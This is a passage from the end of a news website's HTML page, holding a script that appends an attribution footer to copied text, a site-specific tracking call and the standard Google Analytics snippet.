	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('70331', 'haber', '');
	
</script>

    	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
